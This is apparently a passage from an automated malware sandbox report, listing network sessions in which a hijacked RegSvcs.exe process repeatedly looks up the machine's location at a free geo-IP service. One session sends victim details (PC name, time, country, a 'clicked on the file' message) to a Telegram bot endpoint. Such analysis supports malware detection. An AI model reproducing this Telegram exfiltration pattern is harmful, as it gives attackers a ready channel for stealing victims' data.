                                                                                                                      2025-01-11 05:49:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.949839104.21.32.14437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:20 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:20 UTC864INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:20 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889349
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5FqbWQlPPrqSS2KmGXv5S7yYzZIOo7ryFzv58ZXEW%2BxrWFgZWL1i%2FO%2FiglWLXqmid%2Fqcw2onRgwINmGfIkULiO%2B64%2BMqeRr9CLslH%2F7WOJpFt8XKhyOU%2FCHRTB31acgVRrLwyFe"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029f791acf4344-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1653&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1699650&cwnd=47&unsent_bytes=0&cid=868996878e874c7a&ts=143&x=0"
                                                                                                                      2025-01-11 05:49:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.949847104.21.32.14437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:21 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:21 UTC863INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:21 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889350
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tycFXlhF9Sw3wXIO1hl2vXKsmK%2FbQmUeOCtkIZzGgAPxe81INGwYTrytbQXN2B4OGodsItIG%2B26GDomCZsH38%2B%2B%2FPwHK29agVEAbaD84dQDd5qDNoLggA%2FnXukL4gkQrcM%2FUVAY4"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029f813fc241a6-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1560&rtt_var=600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1800246&cwnd=241&unsent_bytes=0&cid=8dc125e107280d09&ts=151&x=0"
                                                                                                                      2025-01-11 05:49:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.949853149.154.167.2204437496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:22 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:34:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-11 05:49:22 UTC344INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:22 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 55
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2025-01-11 05:49:22 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.949888104.21.32.14437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-11 05:49:27 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:27 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889356
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aiEg0wvl6Rll3DxhkLFkvZyAY7w5VkhwjKs0I9Y4S4ap%2FrC%2FfeLnqNJ%2FNR%2BxHTPLv9gnCeCX%2BS1OfGAiElp18q34DgOnmX8zoaWvbTQqNlgd4JgyyzyKPrEtGH8u1kvSrOJ0ae2a"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029fa5ec28c327-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1610&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1787025&cwnd=189&unsent_bytes=0&cid=e725942085660406&ts=174&x=0"
                                                                                                                      2025-01-11 05:49:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      11192.168.2.949893104.21.32.14437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:28 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:28 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889357
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m2D2fSPQP0O%2BrErTWZZF7FvAG429HgOBmQxjz742NuCvmUgTLfN%2FPUX1ltRPIts1rHfABPEvhwxGBINHEdUH318CXb2ax98fxrRjdhF4gH44oc9t%2Fq1UMXCgBEWVx%2B0cajVJa4u3"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029faaef5ec327-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1616&rtt_var=618&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1751649&cwnd=189&unsent_bytes=0&cid=2900603e614835fc&ts=146&x=0"
                                                                                                                      2025-01-11 05:49:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.949902104.21.32.14437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:29 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-11 05:49:29 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:29 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889358
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FlWYZCOuS1jslbjVT3flXrwtbctnhrHvsJdT8%2F1KjZjN82nkM6Ek1Jih%2B4dWlKTEjKS0SZLuPcueURfDBe%2FUhTgpxu9b0k6ciHFEabPY2sDDdEJZcyW5SMpTkcv5HeFRo4PlJhvN"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029fb2ebfa1875-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1563&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1803582&cwnd=153&unsent_bytes=0&cid=a65cc1ad70bb1795&ts=133&x=0"
                                                                                                                      2025-01-11 05:49:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.949912104.21.32.14437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-11 05:49:30 UTC861INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:30 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889359
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XnrnhwZquEOvhzfzfsjF5xgWW5yIJ%2BovcRFZkCN%2Fu4v80PkjW5WNO8V%2FQbfe6xJKJ%2F1j1boR4azmECt3zEs3idbt9vg%2BNeVTylwCjgRERwfWdHj5MnjTboIMtg5eLVW2%2BZnqteLh"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029fbab8a272b9-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1768&rtt_var=675&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1607044&cwnd=217&unsent_bytes=0&cid=4d9c412dc1834f26&ts=146&x=0"
                                                                                                                      2025-01-11 05:49:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.949922104.21.32.14437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:31 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-11 05:49:31 UTC861INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:31 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889361
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cv5bQXp18ANAhahUDx6WCWsFhCa8DJVL27ENnERGyv9rn9eX%2FXkljDgdOmHT%2Frm1Z%2FulQAt0ZUIPQHWH3XfgJ4QaNSnNteuJ%2FLDw21jPDSizoq%2BR%2FQIrEbZQ6pkuLYWzygOSyouy"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029fc2a9bf8cda-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1770&rtt_var=678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1595628&cwnd=243&unsent_bytes=0&cid=97e33ac5ebff4dc8&ts=157&x=0"
                                                                                                                      2025-01-11 05:49:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.949933104.21.32.14437824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-11 05:49:33 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-11 05:49:33 UTC855INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:33 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1889362
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkMKh0eR77RdXqlfnrFo5dxgO1Rs2I8C9G8GF9r3BvF2UZ0ePAAbQS7y0Q6BjWfPMBSRb9vJUAZYDt%2BRHpP9OjsVFH6emjzPrrLttKIuK40%2FceuWCBa289%2Flrd1HlpJFo1ophud5"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 90029fca889d1875-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1630&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1772920&cwnd=153&unsent_bytes=0&cid=bf9a4c0433ae2740&ts=133&x=0"
                                                                                                                      2025-01-11 05:49:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
